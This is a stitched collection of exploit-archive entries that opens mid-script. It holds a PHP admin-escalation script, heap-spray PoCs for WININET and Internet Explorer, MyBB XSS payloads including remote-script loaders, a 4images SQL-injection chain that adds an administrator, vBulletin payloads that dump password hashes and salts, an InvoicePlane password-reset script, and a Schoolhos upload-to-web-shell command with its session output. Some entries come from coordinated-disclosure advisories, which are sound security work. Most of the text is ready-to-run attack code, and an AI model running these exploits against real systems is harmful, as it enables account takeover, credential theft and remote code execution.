$ckfile = dirname(__FILE__) . $cookie;
$cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('username' => $login, 'userpass' => $pass, 'userlogin' => 'Sign In')));
curl_setopt($ch, CURLOPT_POST, 1);
$content = curl_exec($ch);
if (strpos($content, '?logout') === false) {
die("Cannot login");
}
$data = array();
$data['user_admin'] = 1;
$data['user_perms'] = 0;
$data['user_password'] = md5($pass);
curl_setopt($ch, CURLOPT_URL, $url.'/usersettings.php');
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('SaveValidatedInfo' => 1, 'updated_data' => base64_encode(serialize($data)), 'updated_key' => md5(serialize($data)), 'currentpassword' => $pass)));
$content = curl_exec($ch);
if (strpos($content, 'Settings updated') === false) {
die("Exploit probably failed");
}
die('OK!');
}
$url = "http://url_here";
// Standard user credentials
$user = "login_here";
$pass = "password_here";
$cookie = "/cookie.txt";
hack($url, $user, $pass, $cookie);
<!--
Source: http://blog.skylined.nl/20161110001.html
Synopsis
A specially crafted HTTP response can cause the CHttpHeaderParser::ParseStatusLine method in WININET to read data beyond the end of a buffer. The size of the read can be controlled through the HTTP response. An attacker that is able to get any application that uses WININET to make a request to a server under his/her control may be able to disclose information stored after this memory block. This includes Microsoft Internet Explorer, Microsoft Edge and Microsoft Windows Media Player. As far as I can tell WININET is widely used by Microsoft applications to handle HTTP requests, and probably be all third-party applications that use Windows APIs to make HTTP requests. All these applications may be vulnerable to the issue, though it may be hard to exploit in most (if not all, see below).
Known affected versions, attack vectors and mitigations
WININET.dll
The issue was first discovered in pre-release Windows 10 fbl_release.140912-1613, which contained WININET.DLL version 11.00.9841.0. This vulnerability appears to have been present in all versions of Windows 10 since, up until the issue was addressed in August 2016. No mitigations against the issue are known.
Microsoft Internet Explorer
XMLHttpRequest can be used to trigger this issue - I have not tried other vectors. To exploit the vulnerability, Javascript is most likely required, so disabling Javascript should mitigate it.
Microsoft Edge
XMLHttpRequest can be used to trigger this issue - I have not tried other vectors. To exploit the vulnerability, Javascript is most likely required, so disabling Javascript should mitigate it.
Microsoft Windows Media Player
Opening a link to a media file on a malicious server can be used to trigger the issue.
Microsoft has released two bulletins to address this issue, one for Microsoft Internet Explorer and one for Microsoft Edge. I do not know why Microsoft did not mention other applications in their bulletins, nor why they have two fixes for these specific applications, rather than one fix for a component of the Windows Operating System.
One wonders what would happen on a system where you have previously uninstalled both MSIE and Edge: do neither of the fixes apply and will your system be left vulnerable? Let me know if you found out!
Repro
The below repro consists of two parts: an HTML file that constructs an XMLHttpRequest in order to trigger the issue and a raw HTTP response that actually triggers it.
-->
<!DOCTYPE html>
<html>
<head>
<script>
// This PoC attempts to exploit a memory disclosure bug in WININET.dll
// that affects Microsoft Edge and Internet Explorer. However, it fails
// to reveal any information as intended. You might want to use this as
// a starting point for further investigation.
// See http://blog.skylined.nl/20161110001.html for details.
window.onerror = function (a, b, c) {
alert([a,b,c].join("\r\n"));
}
var aauHeap = [];
function spray() {
aauHoles = [];
for (var u = 0; u < 0x10000; u++) {
var auHole = new Uint32Array(0x200 / 4);
aauHoles.push(auHole);
auHole[0] = 0xDEADBEEF;
auHole[1] = 0x0D0A0D0A;
auHole[2] = 0x0;
var auHeap = new Uint32Array(0x200 / 4);
aauHeap.push(auHeap);
auHeap[0] = 0x41424344;
auHeap[1] = 0x0D0A0D0A;
auHeap[2] = 0x0;
}
};
function sendRequest() {
spray();
var oXHR = new XMLHttpRequest();
oXHR.open("GET", "Response.http?" + new Date().valueOf());
oXHR.send();
oXHR.addEventListener("load", function() {
alert("load: " + JSON.stringify(oXHR.status) + " " + JSON.stringify(oXHR.statusText) + "\r\n" +
JSON.stringify(oXHR.responseText));
setTimeout(sendRequest, 1000);
});
oXHR.addEventListener("error", function() {
alert("error: " + JSON.stringify(oXHR.status) + " " + JSON.stringify(oXHR.statusText) + "\r\n" +
JSON.stringify(oXHR.responseText));
setTimeout(sendRequest, 1000);
});
}
sendRequest();
// This work by SkyLined is licensed under a Creative Commons
// Attribution-Non-Commercial 4.0 International License.
</script>
</head>
</html>
<!--
Response.http
HTTP/1.1 100 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
HTTP/1.1 200 X
Description
When WININET is processing a HTTP 100 response, it expects another HTTP response to follow. WININET stores all data received from the server into a buffer, uses a variable to store an index into this buffer to track where it is currently processing data, and uses another variable to store the length of the remaining data in the buffer.
When processing the headers of the HTTP 100 request, the code updates the index correctly, but does not decrement the length variable. When the code processes the next request, the length variable is too large, which can cause the code to read beyond the end of the data received from the server. This may cause it to parse data stored in the buffer that was previously received as part of the current HTTP response, and can even cause it to do the same for data read beyond the end of the buffer. This can potentially lead to information disclosure.
The larger the HTTP 100 response is, the more bytes the code reads beyond the end of the data. Here are some example responses and their effect:
"HTTP 100\r\n\r\nX" (12 bytes in HTTP 100 response)
=> read "X" and the next 11 bytes in memory as the next response.
"HTTP 100\r\n\r\nXXXX" (12 bytes in HTTP 100 response)
=> read "XXXX" and the next 8 bytes in memory as the next response.
"HTTP 100XXX\r\n\r\nX" (15 bytes in HTTP 100 response)
=> read "X" and the next 14 bytes in memory as the next response.
"HTTP 100XXX........XXX\r\n\r\nX..." (N bytes in HTTP 100 response)
=> read "X" and the next (N-1) bytes in memory as the next response.
Exploit
This issue is remarkably similar to an issue in HTTP 1xx response handling I found in Google Chrome a while back. That issue allowed disclosure of information from the main process' memory through response headers. I attempted to leak some data using this vulnerability by using the following response:
"HTTP 100XXX........XXX\r\nHTTP 200 X"
I was hoping this would cause the OOB read to save data from beyond the end of the HTTP 200 reponse in the statusText property of the XMLHttpRequest, but I did not immediately see this happen; all I got was "OK" or an empty string.
Unfortunately, I did not have time to reverse the code and investigate further myself. All VCPs I submitted the issue to rejected it because they though it was not practically exploitable.
Time-line
October 2014: This vulnerability was found through fuzzing.
October-November 2014: This vulnerability was submitted to ZDI, iDefense and EIP.
November-December 2014: ZDI, iDefense and EIP all either reject the submission because Windows 10 is in pre-release, or fail to respond.
August 2015: re-submitted to ZDI, iDefense and EIP, since Windows 10 is now in public release.
September-October 2015: ZDI, iDefense and EIP all either reject the submission because they do not consider it practically exploitable, or fail to respond.
June 2016: This vulnerability was reported to Microsoft with a 60-day deadline to address the issue.
September 2016: The vulnerability was address by Microsoft in MS16-105.
November 2016: Details of this issue are released.
-->
<!--
Source: http://blog.skylined.nl/20161109001.html
Synopsis
A specially crafted web-page can cause Microsoft Internet Explorer to assume a CSS value stored as a string can only be "true" or "false". To determine which of these two values it is, the code checks if the fifth character is an 'e' or a "\0". An attacker that is able to set it to a smaller string can cause the code to read data out-of-bounds and is able to determine if a WCHAR value stored behind that string is "\0" or not.
Known affected versions, attack vectors and mitigations
MSIE 9-11 (earlier versions were not tested)
An attacker would need to get a target user to open a specially crafted webpage. Disabling JavaScript should prevent an attacker from triggering the vulnerable code path.
repro.html
<!DOCTYPE html>
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<script>
// This PoC attempts to exploit a memory disclosure bug in Microsoft Internet
// Explorer 11. On x64 systems, this should cause an access violation when
// run with page-heap enabled, as the code attempts to read a byte
// immediately following a 4 byte memory block.
// See http://blog.skylined.nl/20161109001.html for details.
var o = document.documentElement;
CollectGarbage();
// Heap Feng-Shui plunger
o.setAttribute("a", "1");
o.setAttribute("b", "2");
o.setAttribute("c", "3");
o.setAttribute("d", "4");
o.setAttribute("e", "5");
o.setAttribute("f", "6");
// Allocate a string that contains 3 characters (6 bytes), for which an 8
// byte memory block is allocated:
o.setAttribute("g", "AB\u4141");
// Free the memory block.
o.removeAttribute("g");
// Reallocate the same memory block to store a 1 character string (2 bytes).
// The memory block will look like this:
// 78 00 00 00 41 41 00 00 | "x\0\u4141\0"
// ^- start --------- end -^
// Now have the code attempt to read the fifth character and access OOB data:
document.documentElement.style.setProperty("textdecorationblink", "x");
// This work by SkyLined is licensed under a Creative Commons
// Attribution-Non-Commercial 4.0 International License.
</script>
Description
Certain code that handles CSS properties in MSIE assumes that the property value is always a string set to either "true" or "false". To determine which of these two values it is, the code checks if the fifth character is '\0'. However, it is possible to set such values to arbitrary strings, including a smaller string. This causes the code to read beyond the end of the string and allows an attacker to determine if an WORD stored after the string is '\0'.
The vulnerable code is in MSHTML!PROPERTYDESC::HandleStyleComponentProperty. This code is heavily branched to handle various types of CSS properties. Luckily, the type being exploited is one of the first to be handled. The code appears to assume that the value is provided as a pointer to a BSTR which will always have a WCHAR at offset +8 that may be '\0' or not. If this WCHAR is not '\0', a CSS property is set to a certain value, otherwise it is set to an empty string. As long as this BSTR is always either be "true" or "false", this code works as expected. However, it is possible to provide an arbitrary value for this BSTR, which can be shorter than 4 WCHARs. This would causing the code to read a WCHAR outside of the memory used to store that BSTR.
In the repro, we used Heap Feng-Shui to put a BSTR containing 3 WCHARs in the OLEAUT32 cache. This causes MSIE to allocate 12 byte of memory to store the string: 4 bytes to store the DWORD length of the BSTR, 6 to store the characters, and 2 to store a "\0" terminator. This memory is then reused to store a 1 WCHAR string "x". When the code attempts to check if the fifth character in this his BSTR is '\0', it will attempt to read the two bytes at offset 14 (The characters are stored at offset 4, after the DWORD length, and the fifth character is at offset 10 from the first). This causes the code to read outside of the bounds of that BSTR and trigger an access violation. (On x86 systems, page heap will provide some padding at the end of the string, causing the code to read these padding bytes, so no AV happens).
Known properties of the type that leads to the vulnerable code path include textDecorationBlink, textDecorationLineThrough, textDecorationLineNone, textDecorationOverline, and textDecorationUnderline.
Exploit
The value of a CSS property is updated based on the value of the fifth WCHAR, and this CSS property can be read from Javascript to determine if this WCHAR was '\0' or not. This allows a limited form of information disclosure. During my testing, I used the textDecorationBlink property, which can be used to set the CSS text-decoration property to "blink" or an empty string.
Using Heap-Feng Shui, it may be possible to reuse memory allocated for other strings that have since been freed and determine if they had a '\0' WCHAR as their fifth character. This includes strings to should normally not be accessible to the website, such as those from a different origin. Also using Heap Feng-Shui, it may be possible to allocate some interesting object immediately following the string, in order to determine if a WORD at the start of that object is 0 or not.
The "exploit" provided below shows that it is possible to determine if the fifth WCHAR of the last freed BSTR was '\0' or not.
Time-line
Februari 2016: This vulnerability was found through fuzzing.
Februari 2016: This vulnerability was submitted to ZDI, iDefense and EIP.
March-July 2016: ZDI, iDefense and EIP all either reject the submission or fail to respond.
July 2016: This vulnerability was reported to Microsoft with a 60-day deadline to address the issue.
August 2016: Microsoft is granted an 11 day extension to the deadline to address it in September's Patch Tuesday.
September 2016: The vulnerability was address by Microsoft in MS16-104.
November 2016: Details of this issue are released.
-->
<!DOCTYPE html>
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<script>
// This PoC attempts to exploit a memory disclosure bug in Microsoft Internet
// Explorer 11. See http://blog.skylined.nl/20161109001.html for details.
var sSetPropertyName = "textdecorationblink", //textDecorationLineThrough, textDecorationLineNone, textDecorationOverline, textDecorationUnderline
sGetPropertyName = "text-decoration",
sPropertyValue = "blink";
function fbTest(sTest) {
var o = document.createElement("x");
// Cleanup, potentially fill OLEAUT32 BSTR cache
CollectGarbage();
// Empty the smallest BSTR bucket of the OLEAUT32 cache and defragement the small chunks heap.
o.setAttribute("a", "1");
o.setAttribute("b", "2");
o.setAttribute("c", "3");
o.setAttribute("d", "4");
o.setAttribute("e", "5");
o.setAttribute("f", "6");
// Add the <sTest> BSTR to the smallest bucket of the OLEAUT32 BSTR cache.
o.setAttribute("x", sTest);
o.removeAttribute("x");
// reused the <sTest> memory and overwrite the first two chars with 'x' and '\0', then read from offset +8
o.style.setProperty(sSetPropertyName, "x");
var bResult = o.style.getPropertyValue(sGetPropertyName) == sPropertyValue;
alert(JSON.stringify(sTest) + "=>" + bResult);
};
fbTest("12345"); // true
fbTest("1234\0"); // false
fbTest("1234"); // false
fbTest("123"); // (AV on x64 if page heap enabled).
// This work by SkyLined is licensed under a Creative Commons
// Attribution-Non-Commercial 4.0 International License.
</script>
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: MyBB 1.8.6
Fixed in: 1.8.7
Fixed Version Link: http://resources.mybb.com/downloads/mybb_1807.zip
Vendor Website: http://www.mybb.com/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 01/29/2016
Disclosed to public: 09/15/2016
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
MyBB is forum software written in PHP. In version 1.8.6, it contains various
XSS vulnerabilities, some of which are reflected and some of which are
persistent. Some of them depend on custom forum or server settings.
These issues may lead to the injection of JavaScript keyloggers, injection of
content such as ads, or the bypassing of CSRF protection, which would for
example allow the creation of a new admin user.
3. Details
XSS 1: Persistent XSS - Signature
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
Description: The profile editor of the moderator control panel does not
properly encode the signature of a user when editing it. Because of this, a
user can create a specifically crafted signature and - once a moderator or
admin visits the profile editor for that user - the injected code will be
executed in the context of the victims browser.
Proof of Concept:
Visit the profile at: http://localhost/mybb_1806/Upload/modcp.php?action=editprofile&uid=[USER_ID] As signature, use: </textarea><img src=no onerror=alert(1)>
XSS 2: Persistent XSS - Forum Post (depending on forum settings)
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description: An admin can allow HTML input for specific forums via the setting
allowhtml. There are various filters in place which intend to make this safe,
which may leave the admin with the impression that it is indeed safe. However,
there are various possibilities to bypass these filters, mainly using HTML5
features.
Proof of Concept:
<body onpageshow=alert(1)> -> Visiting the post will trigger the code <div
contextmenu="mymenu" oncontextmenu=alert(1)>context menu</pre> -> A right-click
will trigger the code <form action=""> Enter something: <input type="text" name
="myinput" oninput="alert(1)"><br> <input type="submit" value="Submit"> </form>
-> Input into the field will trigger the code <form action=""> <input type=
"text" name="myinput" oninvalid="alert(1)" required> <input type="submit" value
="Submit"> </form> -> A click on submit will trigger the code
There are various other attributes which may also work, such as onsearch,
onkeydown, onkeyup, ondrag, onscroll, oncopy, and so on. Other attributes such
as onMouseOver or onFocus are filtered out.
XSS 3: Persistent XSS - Username (depending on forum settings)
CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N
Description: The username is echoed unencoded in the user area. As the login
does not have CSRF protection and as an admin can be logged into the admin area
with a different account than the one they are logged into the forum, a
persistent XSS vulnerability in the user area can be exploited. However,
successful exploitation most likely requires a username length of at least 43
characters, which is more than the default settings allow.
Simple Proof of Concept:
1. register user with name f" onmouseover="alert(1)" b=" 2. login and visit
http://localhost/mybb_1805/Upload/usercp.php 3. hover over the avatar
The simple proof of concept can be improved to allow successful exploitation.
It is not required for the victim to hover over the avatar or interact with the
webpage in any way:
1. As username, use: f" onerror="alert(1)" b=" 2. Set an avatar, and use a URL
as source (not an image upload) 3. Delete the image from the remote host,
making it unavailable, thus triggering an error and executing the injected
code.
Possible Payloads:
Loading a script with vanilla javascript takes a lot more characters than are
allowed in a username by default:
"onerror="s=document.createElement('script');s.src='http://localhost/s.js';
document.getElementById('top').appendChild(s)"
As jQuery is loaded, this can be optimized:
"onerror="$.getScript('http://aa.bc/s.js')
Executing the payload for a victim:
The attack does not require the victim to not be logged in as normal user, as
one can login even when already logged in. The login as a normal user also does
not affect the login as admin. Thus, an attacker could use the following
payload to log a victim in and redirect them to the site containing the
payload:
<iframe id="myframe" style="display: none" name="myframe" src="about:blank"></
iframe> <form method="post" action="http://localhost/mybb_1805/Upload/
member.php" target="myframe" id="myform" name="myform"> <input name="action"
type="hidden" value="do_login" /> <input name="url" type="hidden" value="http:/
/localhost/mybb_1805/Upload/usercp.php" /> <input name="quick_login" type=
"hidden" value="1" /> <input name="quick_username" type="hidden" value=
""onerror="$.getScript('http://localhost/s.js')" /> <input name=
"quick_password" type="hidden" value="123456" /> <input name="quick_remember"
type="hidden" value="yes" /> </form> <script>document.myform.submit();</script>
It will automatically log the victim in and redirect them to the page that
triggers the script execution. No action of the victim is required. The loaded
script could for example perform a backup of the database and then send the
attacker the name of the backup, as backups are stored in a public directory.
XSS 4: Persistent XSS - Post Attachment (depending on server settings)
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description: Attachments are uploaded to a public directory, and their
extension is changed to .attach. Files with extension .attach that contain HTML
code are interpreted as HTML files by some default server configurations (for
example Apache). Additionally, the directory where the files are uploaded to
does not prevent directory listing via an index.html file as all the other
directories of MyBB do. Because of this, an attacker can find the name of the
file and send it to a victim. Once the victim visits the link, the JavaScript
code in the file would execute.
Proof of Concept:
1. upload HTML file containing <html><body><script>alert(1);</script></body></
html> 2. find file located at /mybb_1805/Upload/uploads/YYYMM/
RANDOM_STRING.attach. The YYYMM directory is not protected against directory
browsing via an index.php or index.html file like most other directories of
MyBB, which means depending on the server configuration, the file can easily be
found 3. send admin there
XSS 5: Reflected XSS - Account Activation
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description: The account activation form echoes a given code unencoded to the
user, resulting in reflected XSS.
Proof of Concept:
http://localhost/mybb_1806/Upload/member.php?action=activate&uid=-1&code=">
<script>alert(1)<%2fscript>
XSS 6: Reflected XSS - Update (depending on locked state)
CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N
Description: In many of the update scripts, POST values are echoed without
proper encoding. The scripts are upgrade3.php, upgrade12.php, upgrade13.php,
upgrade17.php, and upgrade30.php. As this attack only works when the forum is
disabled, the forum itself cannot be attacked, but the attack could be used to
attack other software hosted on the same domain.
Proof of Concept:
<form id="myForm" action="http://localhost/mybb_1805/Upload/install/
upgrade.php" method="POST"> <input name="action" value="30_dbchanges_ip">
<input name="iptask" value="5"> <input name="iptable" value="7"> <input name=
"ipstart" value="<script>alert(1)</script>"> <input type="submit" value=
"Submit"> </form> <script> document.getElementById("myForm").submit(); </
script>
XSS 7: Reflected CSS Injection
CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N
Description: When displaying an error, MyBB echoes user input in a style
context, allowing an attacker to inject CSS. With this, it may be possible to
change the look of the website or extract information, and it may lead to XSS
in older browsers.
Proof of Concept:
This script submits a search, which will trigger an SQL error because of the
non-existing author. All it does then is change the background color of the
error report to black to show the existence of the injection:
<form id="myForm" action="http://localhost/mybb_1805/Upload/search.php/) ; }
%23error { background: %23000000; } /*" method="POST"> <input name="action"
value="do_search"> <input name="author" value="nonexistentauthor"> <input name=
"matchusername" value="1"> </form> <script> document.getElementById
("myForm").submit(); </script>
4. Solution
To mitigate this issue please upgrade at least to version 1.8.7:
http://resources.mybb.com/downloads/mybb_1807.zip
Please note that a newer version might already be available.
5. Report Timeline
01/29/2016 Informed Vendor about Issue
02/26/2016 Vendor requests more time
03/11/2016 Vendor releases fix
09/15/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/MyBB-186-XSS-160.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
# vulnerable app : 4images <= 1.7.13
# Vendor : www.4homepages.de
# Author : Ahmed sultan (0x4148)
# Email : 0x4148@gmail.com
# Home : 0x4148.com
4images is a powerful web-based image gallery management system. Features
include comment system,
user registration and management, password protected administration area
with browser-based upload and HTML templates for page layout and design.
The app is vulnerable to Sql injection flaw which can be escalated to new
administrator add exploit
Vulnerable code
File : admin/validateimages.php
Line 406
$sql = "SELECT i.image_id, i.cat_id, i.user_id, i.image_name,
i.image_date, i.image_media_file".get_user_table_field(", u.",
"user_name")."
FROM ".IMAGES_TEMP_TABLE." i
LEFT JOIN ".USERS_TABLE." u ON (".get_user_table_field("u.",
"user_id")." = i.user_id)
WHERE $condition
ORDER BY $orderby $direction
LIMIT $limitstart, $limitnumber";
$result = $site_db->query($sql);
Input parameter orderby is not sanitized before being passed to the sql
query which lead to sql injection flaw
POC
GET
/lab/4images1.7.13/4images/admin/validateimages.php?action=validateimages&orderby=extractvalue(1,concat(0x7e,version()))&direction=ASC&limitnumber=10
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101
Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: 4images_lastvisit=1478064418; 4images_userid=1;
sessionid=ru4g0mqdpd3cj6pub1d0a5kmf4
Will result in
<br /><font color='#FF0000'><b>DB Error</b></font>: <b>Bad SQL Query</b>:
SELECT i.image_id, i.cat_id, i.user_id, i.image_name, i.image_date,
i.image_media_file, u.user_name
FROM 4images_images_temp i
LEFT JOIN 4images_users u ON (u.user_id = i.user_id)
WHERE 1=1
ORDER BY extractvalue(1,concat(0x7e,version())) ASC
LIMIT 0, 10<br /><b>XPATH syntax error: '~5.5.25a'
To reproduce, add normal user account, add a category and allow users to upload images in it.
Login with the normal user account and upload an image.
Try the poc
Exploitation :
By the help of JS the sql injection flaw can be used to obtain the current
csrf token and use it to add new administrator within the admin browser
session
Full exploit poc
admin/validateimages.php?action=validateimages&orderby=extractvalue(1,concat(0x3c7376672f6f6e6c6f61643d6576616c28222f2a222b55524c293e))&direction=ASC&limitnumber=10#*/with(document)body.appendChild(createElement(/script/.source)).src=atob(/Ly9sb2NhbGhvc3QveC5qcw==/.source)
Ly9sb2NhbGhvc3QveC5qcw== is the base64 encoded Javascript url which will be
executed inside administrator's browser
Impact
Attacker can inject JS code which result in bypassing the CSRF token ,
adding new administrator's account
or even updating allowed extensions and uploading php shell on the
vulnerable host
Reference(s):
https://0x4148.com/2016/11/02/4images-1-7-13-sql-injection-administrator-add-exploit/
Disclosure timeline
1/11 - Vulnerability was reported
2/11 - Vendor sent fixation to review
3/11 - Fixed evrsion was retested by me and approved
3/11 - Vendor scheduled official update release
10/11 - Public disclosure
##################################################################################################
#Exploit Title : vBulletin <= 4.2.3 SQL Injection (CVE-2016-6195)
#Author : Manish Kishan Tanwar AKA error1046 (https://twitter.com/IndiShell1046)
#Date : 25/08/2015
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
#Tested At : Indishell Lab(originally developed by Dantalion)
##################################################################################################
////////////////////////
/// Overview:
////////////////////////
VBulletin version 3.6.0 through 4.2.3 are vulnerable to SQL injection vulnerability in vBulletin core forumrunner addon.
Vulnerability was analized and documented by Dantalion (https://enumerated.wordpress.com/2016/07/11/1/)
so credit goes to Dantalion only :)
////////////////
/// POC ////
///////////////
SQL Injection payload to enumerate table names
----------------------------------------------
http://forum_directory/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x),5,6,7,8,9,10-- -
SQL Injection payload to enumerate column names from table "user"
----------------------------------------------------------------
http://forum_directory/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.columns)where (table_name=0x75736572) and (0x00) in (@x:=concat(@x,0x3c62723e,column_name))))x),5,6,7,8,9,10-- -
SQL Injection payload to enumerate username,password hash and salt from "user" table
----------------------------------------------------------------------------------
http://forum_directory//forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (user)where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,password,0x3a,salt))))x),5,6,7,8,9,10-- -
/////////////////
exploit code ends here
--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
#############################################################################################
--==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
--==[[ Special Fuck goes to ]]==--
<3 suriya Cyber Tyson <3
# Exploit Title: InvoicePlane v1.4.8 Incorrect Access Control for password =
reset
# Date: 12-11-2016
# Exploit Author: feedersec
# Contact: feedersec@gmail.com
# Vendor Homepage: https://invoiceplane.com
# Software Link: https://invoiceplane.com/download/v1.4.8
# Version: v1.4.8=20
# Tested on: ubuntu 16.04 LTS
# Description: An unauthenticated user can POST to=20
# /index.php/sessions/passwordreset setting a new password for any user
import urllib2, urllib
#set parameters here
user_id =3D '1'
new_password =3D 'haxor'
baseUrl =3D 'http://localhost/'
####
data =3D urllib.urlencode({'user_id': user_id,=20
=09=09=09 'new_password' : new_password,
=09=09=09 'btn_new_password' : '1'})
req =3D urllib2.Request(baseUrl + 'index.php/sessions/passwordreset', data)
response =3D urllib2.urlopen(req)
<?php
/*
Software : Schoolhos CMS 2.29
Home : http://www.schoolhos.com/
Author : Ahmed sultan (0x4148)
Email : 0x4148@gmail.com
Home : 0x4148.com
Intro
Schoolhos CMS is alternative to developing School Website. It's Free and Open Source under GPL License. Easy to install, user friendly and elegant design.
Schoolhos is vulnerable to unauthenticated remote code execution vulnerability , Unauthenticated sql injection flaws
I - Remote code execution
File : process.php
Line : 42
elseif ($pilih=='guru' AND $untukdi=='upload'){
$lokasi_file = $_FILES['fupload']['tmp_name'];
$nama_file = $_FILES['fupload']['name'];
UploadMateri($nama_file);
File : file_uplaod.php
Line : 9
function UploadMateri($fupload_name){
//direktori file dari halaman e-elarning
$vdir_upload = "../file/materi/";
$vfile_upload = $vdir_upload . $fupload_name;
move_uploaded_file($_FILES["fupload"]["tmp_name"], $vfile_upload);
}
POC
curl -i -s -k -X 'POST' \
-H 'Content-Type: multipart/form-data; boundary=---------------------------26518470919255' \
--data-binary $'-----------------------------26518470919255\x0d\x0aContent-Disposition: form-data; name=\"fupload\"; filename=\"0x4148.php\"\x0d\x0aContent-Type: application/x-httpd-php\x0d\x0a\x0d\x0a<?php die(\"0x4148 rule\"); ?>\x0d\x0a-----------------------------26518470919255\x0d\x0a\x0d\x0a' \
'http://HOST/PATH/elearningku/proses.php?pilih=guru&untukdi=upload'
php file can be ccessed via : http://HOST/PATH/file/materi/0x4148.php
II - Unauthenticated sql injection
File : elearningku/download.php
Line 6
$file=mysql_query("SELECT * FROM sh_materi WHERE id_materi='$_GET[id]'");
$r=mysql_fetch_array($file);
$filename=$r[file_materi];
header("Content-Type: octet/stream");
header("Pragma: private");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private",false);
header("Content-Type: $ctype");
header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".filesize($dir.$filename));
readfile("$dir$filename");
POC : versi_2.29/elearningku/download.php?id=-1' union select 1,version(),3,4,5,6,7,8-- -
DB version will be showed as filename
Script is really full of injection flaws , mentioning all of it is such waste of time
Full exploitation Demo
~0x4148fo# php scho.php http://192.168.0.50/lab/scho/versi_2.29/
[*] Schoolhos CMS 2.29 Remote command execution
[*] Author : Ahmed sultan (0x4148)
[*] Connect : 0x4148.com | 0x4148@gmail.com
+ Sending payload to http://192.168.0.50/lab/scho/versi_2.29/
+ Payload sent successfully
0x4148@http://192.168.0.50/lab/scho/versi_2.29/# dir
Volume in drive C is OS_Install
Volume Serial Number is D60F-0795
Directory of C:\xampp\htdocs\lab\scho\versi_2.29\file\materi
11/13/2016 02:03 AM <DIR> .
11/13/2016 02:03 AM <DIR> ..
11/13/2016 02:03 AM 47 0x4148.php
11/30/2011 06:56 PM 8,522 aku.php
11/29/2011 02:02 AM 74 Alar Reproduksi.rar
11/29/2011 02:03 AM 74 albert.rar
11/29/2011 08:25 PM 12,326 ari.png
11/29/2011 08:27 PM 12,318 ari.rar
11/29/2011 06:57 PM 74 cerita.rar
11/29/2011 08:24 PM 0 contoh.txt
11/29/2011 02:05 AM 74 dos.rar
11/29/2011 02:01 AM 74 English1.rar
12/12/2011 11:13 AM 117 index.html
11/29/2011 02:10 AM 74 kekebalantubuh.rar
11/29/2011 02:11 AM 74 masa jenis.rar
11/29/2011 02:14 AM 74 office.rar
